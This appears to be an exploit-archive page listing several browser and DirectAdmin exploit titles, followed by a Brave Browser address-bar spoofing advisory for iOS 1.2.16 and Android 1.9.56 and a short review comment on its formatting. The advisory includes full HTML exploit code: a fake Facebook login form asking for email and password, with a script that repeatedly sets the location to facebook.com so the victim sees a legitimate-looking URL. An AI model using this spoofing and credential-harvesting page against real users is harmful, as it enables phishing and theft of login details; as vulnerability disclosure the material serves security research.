
3 new exploits

Brave Browser 1.2.16/1.9.56 - Address Bar URL Spoofing
Advanced Desktop Locker 6.0.0 - Lock Screen Bypass
DirectAdmin 1.28/1.29 - CMD_SHOW_RESELLER user Parameter Cross-Site Scripting
DirectAdmin 1.28/1.29 - CMD_SHOW_USER user Parameter Cross-Site Scripting
DirectAdmin 1.28/1.29 - CMD_TICKET_CREATE TYPE Parameter Cross-Site Scripting
DirectAdmin 1.28/1.29 - CMD_EMAIL_FORWARDER_MODIFY user Parameter Cross-Site Scripting
DirectAdmin 1.28/1.29 - CMD_TICKET type Parameter Cross-Site Scripting
DirectAdmin 1.28/1.29 - CMD_EMAIL_VACATION_MODIFY user Parameter Cross-Site Scripting
DirectAdmin 1.28/1.29 - CMD_EMAIL_LIST name Parameter Cross-Site Scripting
DirectAdmin 1.28/1.29 - CMD_FTP_SHOW DOMAIN Parameter Cross-Site Scripting
DirectAdmin 1.28/1.29 - 'CMD_SHOW_RESELLER' Cross-Site Scripting
DirectAdmin 1.28/1.29 - 'CMD_SHOW_USER' Cross-Site Scripting
DirectAdmin 1.28/1.29 - 'CMD_TICKET_CREATE' Cross-Site Scripting
DirectAdmin 1.28/1.29 - 'CMD_EMAIL_FORWARDER_MODIFY' Cross-Site Scripting
DirectAdmin 1.28/1.29 - 'CMD_TICKET' Cross-Site Scripting
DirectAdmin 1.28/1.29 - 'CMD_EMAIL_VACATION_MODIFY' Cross-Site Scripting
DirectAdmin 1.28/1.29 - 'CMD_EMAIL_LIST' Cross-Site Scripting
DirectAdmin 1.28/1.29 - 'CMD_FTP_SHOW' Cross-Site Scripting
DirectAdmin 1.292 - CMD_USER_STATS Cross-Site Scripting
DirectAdmin 1.292 - 'CMD_USER_STATS' Cross-Site Scripting
DirectAdmin 1.50.1 - Denial of Service
31 lines
1 KiB
HTML
Executable file
Brave Browser Suffers from Address Bar Spoofing Vulnerability. Address Bar
spoofing is a critical vulnerability in which any attacker can spoof the
address bar to a legit looking website but the content of the web-page
remains different from the Address-Bar display of the site. In Simple
words, the victim sees a familiar looking URL but the content is not from
the same URL but the attacker controlled content. Some companies say "We
recognize that the address bar is the only reliable security indicator in
modern browsers" .
Products affected:

- In IOS - Affected is the Latest Version 1.2.16 (16.09.30.10)
- In Android - Affected in Brave Latest version 1.9.56


Exploit Code:

<html>
<title>Address Bar spoofing Brave</title>
<h1> This is Dummy Facebook </h1>
<form>
Email: <input type="text" name="username" placeholder="add email"><br>
Password: <input type="text" name="password" placeholder="pass">
<script>
function f()
{
location = "https://facebook.com"
}
setInterval("f()", 10);
</script>
</html>
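Review bot: the advisory text at the top of this file sits outside any HTML comment, so in a file stored as HTML it renders as page content ahead of the dummy form; wrap everything above `<html>` in `<!-- ... -->` or keep the write-up in a separate text file. The description also never ties the behaviour it reports to the script: one sentence stating that the effect depends on `setInterval("f()", 10)` repeatedly assigning `location = "https://facebook.com"` would let a tester confirm a fix on builds later than the iOS 1.2.16 and Android 1.9.56 versions listed. Minor: `<form>` is never closed, there is no `<body>`, and the entry names no fixed version or vendor reference.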